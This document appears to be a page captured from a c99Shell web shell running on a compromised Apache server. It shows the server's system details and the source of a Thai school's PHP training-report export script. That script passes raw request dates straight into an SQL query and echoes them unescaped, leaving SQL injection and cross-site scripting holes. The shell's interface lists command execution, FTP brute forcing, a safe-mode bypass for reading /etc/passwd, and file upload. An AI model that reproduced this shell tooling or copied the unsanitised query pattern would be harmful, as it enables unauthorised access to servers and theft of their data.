!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.98 GB of 127.8 GB (41.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SearchTraningListToExcel.php (3.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $filename 
="report_".(($_REQUEST['dateStart'])?$_REQUEST['dateStart']:date("d/m/Y"))."-".(($_REQUEST['dateFinish'])?$_REQUEST['dateFinish']:date("d/m/Y")).".xls";
    
header('Content-type: application/xls');
    
header('Content-Disposition: attachment; filename='.$filename);

    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');
    
    
/**  Configuration  */
    
include( "configuration.php" );
    require_once( 
$_Config_absolute_path "/includes/framework.php" );
    require_once( 
$_Config_absolute_path "/include/Function.php" );

    
/**  Create Database Object  */
    
$dbObj = new DBConn;
    
    
$query " SELECT *  FROM formaoffice , personal_tb  WHERE personal_tb.Teacher_code = formaoffice.Teacher_code AND formaoffice.Date_start >= '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND formaoffice.Date_finish <= '".dmyE2ymdT($_REQUEST['dateFinish'])."' ";
    
$result $dbObj->execQuery($query);
    
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<!--<title><?=$_Config_sitename;?> - ¢éÍÁÙŧҹÊÒúÃó - ¢éÍÁÙÅÃÒ¡ÒÃ˹ѧÊ×ÍÃѺ-Êè§</title>
<script type="text/javascript" src="./js/utilities.js"></script>
<script type="text/javascript" src="./js/calendarDateInput2.js"></script>
<link href="./css/default.css" rel="stylesheet" type="text/css" />-->
</head>
<body>
<table width="816" border="1" align="center" cellpadding="0" cellspacing="0">
            <tr bgcolor="#F0F0F0">
              <td height="31" colspan="4" align="center"><strong>¢éÍÁÙÅ¡ÒÃä»ÃÒª¡ÒàµÑé§áµèÇѹ·Õè  <?=($_REQUEST['dateStart'])?dmyE2dmyT($_REQUEST['dateStart']):dmyE2dmyT(date("d/m/Y"));?>  ¶Ö§Çѹ·Õè  <?=($_REQUEST['dateFinish'])?dmyE2dmyT($_REQUEST['dateFinish']):dmyE2dmyT(date("d/m/Y"));?></strong></td>
            </tr>
            <tr bgcolor="#F0F0F0">
              <td width="30" height="25" align="center"><strong>No</strong></td>
              <td width="168" align="center"><strong>ª×èÍ</strong></td>
              <td width="433" align="center"><strong>àÃ×èͧ</strong></td>
              <td width="175" align="center"><strong>ÃÐËÇèÒ§Çѹ·Õè</strong></td>
            </tr>
            <?php 
           $no 
1+($display-1)*$limit;
            while( 
$rs $dbObj->fetchArray($result) ) { 
                
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
          
?>
            <tr>
              <td height="23" align="center"><?=$no;?></td>
              <td align="left"><?php echo " $rs[First_name] $rs[Teacher_name]  $rs[Teacher_lastname]";?></td>
              <td align="left"><?php if( $rs['Training_name'] != "" ) echo $rs['Training_name']; else echo "&nbsp;"?></td>
              <td align="center"><?php 
                $sday 
$rs['Date_start'];
                
$yearthai explode("-",$sday);
                
$day intval($yearthai[2]);
                
$month intval($yearthai[1]);
                
$year intval($yearthai[0]);     
                
$m getThaiSubMonth($month);
                echo 
"$day"." "."$m"." "."$year";
            
?>
                -
                <?php 
                $sday 
$rs['Date_finish'];
                
$yearthai explode("-",$sday);
                
$day intval($yearthai[2]);
                
$month intval($yearthai[1]);
                
$year intval($yearthai[0]);     
                
$m getThaiSubMonth($month);
                echo 
"$day"." "."$m"." "."$year";
            
?></td>
            </tr>
            <?php 
               $no
++;
            } 
# while 
          
?>
</table>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--